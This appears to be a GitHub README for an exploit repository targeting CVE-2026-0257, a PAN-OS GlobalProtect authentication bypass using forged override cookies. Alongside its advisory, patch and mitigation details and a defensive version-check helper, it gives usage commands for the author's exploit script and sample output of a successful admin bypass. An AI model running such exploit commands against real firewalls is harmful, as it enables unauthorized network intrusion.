0xBlackash/CVE-2026-0257

GitHub: 0xBlackash/CVE-2026-0257


# 🚨 CVE-2026-0257 - Authentication Bypass Vulnerabilities

**PAN-OS: GlobalProtect Authentication Bypass Vulnerabilities**

![Palo Alto Networks](https://img.shields.io/badge/Vendor-Palo%20Alto%20Networks-red) ![Severity](https://img.shields.io/badge/Severity-HIGH%20%2F%20CRITICAL-orange) ![Published](https://img.shields.io/badge/Published-May%2013%2C%202026-blue)

**Authentication Bypass in GlobalProtect Portal & Gateway**
## 📌 Overview

**CVE-2026-0257** is an **authentication bypass vulnerability** affecting the GlobalProtect portal and gateway components of Palo Alto Networks PAN-OS software. An unauthenticated remote attacker can bypass security restrictions and establish an **unauthorized VPN connection** to affected firewalls.

## ⚠️ Severity & Scoring

| Metric | Score | Rating |
|---------------------|------------------------|-------------|
| **CVSS v4.0** | 7.8 / 4.7 | **High** / Medium |
| **CVSS v3.x** | Up to 9.8 | **Critical** |
| **Urgency** | **HIGHEST** | - |

**Vector (CVSS 4.0 example)**: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:N`

## 📖 Description

Authentication bypass vulnerabilities in the GlobalProtect portal and gateway of Palo Alto Networks PAN-OS® software allow the attacker to bypass security restrictions and establish an unauthorized VPN connection.

The issue stems from **CWE-565: Reliance on Cookies without Validation and Integrity Checking**.

## 🛠 Affected Products

- **PAN-OS** versions prior to fixed releases (10.2, 11.1, 11.2, 12.1)
- **Prisma Access** (specific versions)
- Firewalls with **GlobalProtect** portal or gateway configured

**Not Affected**:

- Panorama
- Cloud NGFW

## 🔍 Vulnerable Configuration

This vulnerability **requires** the following configuration to be exploitable:

1. GlobalProtect portal **or** gateway is configured
2. **Authentication override cookies** are enabled
3. The authentication override cookie encryption/decryption certificate is **reused** with another feature

## 💥 Impact

- **Unauthorized VPN access** to internal networks
- Potential lateral movement by attackers
- Bypass of multi-factor authentication (in certain setups)
- Significant risk to enterprise perimeters

**High impact on confidentiality and integrity** of protected networks.
## 🔥 Exploitation Status

- **Actively Exploited** in the wild (as of May 17, 2026)
- Rapid7 observed successful exploitation
- Palo Alto Networks confirmed limited exploit attempts
- Added to **CISA Known Exploited Vulnerabilities (KEV)** catalog on May 29, 2026

## ⚙️ Usage:

```bash
python3 CVE-2026-0257.py --target vpn.company.com
python3 CVE-2026-0257.py --target 192.168.1.100 --user administrator --verbose
```

## ✅ Expected Successful Output:

```
╔══════════════════════════════════════════════════════════════╗
║          CVE-2026-0257 - GlobalProtect Auth Bypass           ║
║              Public Key Cookie Forging Exploit               ║
║                      Author: 0xBlackash                      ║
╚══════════════════════════════════════════════════════════════╝
[*] Connecting to vpn.company.com:443 to extract certificate chain...
[+] Found 2048-bit RSA key
[*] Forging authentication cookie for user: admin
[1/1] Trying public key...
Cookie (first 60 chars): eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
[+] SUCCESS! Authentication Bypass Achieved!
Username : admin
Cookie : eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
```

## ✅ Patches & Fixes

**Fixed Versions** (apply **urgently**):

| PAN-OS Version | Fixed Release |
|----------------|--------------------------------|
| 12.1 | ≥ 12.1.4-h6, ≥ 12.1.7 |
| 11.2 | ≥ 11.2.4-h17, ≥ 11.2.7-h14, etc. |
| 11.1 | ≥ 11.1.4-h33, ≥ 11.1.7-h6, etc. |
| 10.2 | ≥ 10.2.7-h34, ≥ 10.2.10-h36, etc. |

**Prisma Access** also has corresponding fixed versions.
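A triage helper for the vulnerable-configuration list and the fixed-release table above, added here as an example and not part of the original repository. The function names, status strings and the rule for reading each `≥` entry are assumptions, and it only knows the releases the table lists.

```python
import re

# Fixed releases copied from the table above. The 11.2, 11.1 and 10.2 rows end
# in "etc.", so those lists are incomplete; unlisted releases are not judged.
FIXED = {
    "12.1": ["12.1.4-h6", "12.1.7"],
    "11.2": ["11.2.4-h17", "11.2.7-h14"],
    "11.1": ["11.1.4-h33", "11.1.7-h6"],
    "10.2": ["10.2.7-h34", "10.2.10-h36"],
}
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse(version):
    """Split 'A.B.C' or 'A.B.C-hN' into (train 'A.B', maintenance C, hotfix N or 0)."""
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version: {version!r}")
    major, minor, maint, hotfix = m.groups()
    return f"{major}.{minor}", int(maint), int(hotfix or 0)


def version_status(version):
    """Return 'fixed', 'affected' or 'check-advisory' for one PAN-OS version."""
    train, maint, hotfix = parse(version)
    for entry in FIXED.get(train, []):
        _, fixed_maint, fixed_hotfix = parse(entry)
        has_hotfix = "-h" in entry
        if has_hotfix and maint == fixed_maint:
            # Assumption: a '-hN' entry speaks only for its own maintenance release.
            return "fixed" if hotfix >= fixed_hotfix else "affected"
        if not has_hotfix and maint >= fixed_maint:
            # Assumption: a plain 'A.B.C' entry covers every later release in the train.
            return "fixed"
    return "check-advisory"


def triage(version, gp_enabled, override_cookies, cert_reused):
    """Combine the three configuration preconditions with the version check."""
    if not (gp_enabled and override_cookies and cert_reused):
        return "config-not-exploitable"
    return version_status(version)
```

A `check-advisory` result means the release is not covered by the rows shown here and has to be looked up in the vendor advisory.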
## 🛡️ Mitigations

**Immediate Workarounds** (if patching not possible):

- Disable **authentication override cookies** if not required
- Avoid certificate reuse for GlobalProtect authentication override
- Monitor GlobalProtect logs for suspicious VPN connections
- Restrict management access and enable strict security policies

## 🔗 References

- [Official Palo Alto Networks Advisory](https://security.paloaltonetworks.com/CVE-2026-0257)
- [NVD Detail](https://nvd.nist.gov/vuln/detail/CVE-2026-0257)
- [Rapid7 Analysis](https://www.rapid7.com/blog/post/etr-rapid7-observed-exploitation-of-pan-os-globalprotect-authentication-bypass-vulnerability-cve-2026-0257)
- [CISA KEV Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)

## 📅 Timeline

| Date | Event |
|-------------------|-------|
| **2026-05-13** | CVE Published + Initial Advisory |
| **2026-05-17** | Exploitation observed in the wild |
| **2026-05-29** | Palo Alto update + CISA KEV addition |
| **2026-05-30** | This Report |

**Recommendation**: Patch **immediately**, and treat this as **critical** despite the base CVSS score because of active exploitation.

*Generated in README style, May 30, 2026*